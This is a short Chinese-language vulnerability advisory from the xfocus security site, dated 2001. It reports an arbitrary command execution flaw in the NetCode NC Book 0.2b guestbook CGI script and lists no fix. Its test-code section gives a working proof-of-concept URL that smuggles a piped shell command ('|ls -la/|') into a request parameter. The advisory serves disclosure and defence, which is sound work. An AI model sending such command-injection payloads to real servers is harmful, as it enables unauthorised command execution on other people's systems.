xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

NetCode NC Book 0.2b 存在任意命令可执行漏洞


发布时间:2001-08-14
更新时间:2001-08-14
严重程度:
威胁程度:普通用户访问权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
NetCode NC Book 0.2b
详细描述
NetCode NC Book是一留言本程序,可以在如下地址找到如下信息:
http://netcode.lgg.ru/vault/ncbook/。其中存在一个漏洞可以造成任意命令可执行,问题存在于对管道的处理不够正确造成任意命令的执行。

测试代码
http://target/cgi-bin/ncbook/book.cgi?
action=default&current=|ls -
la/|&form_tid=996604045&prev=main.html&list_mess
age_index=10

解决方案
尚无

相关信息
Hannibal Lector (digitalseed@poizonb0x.org)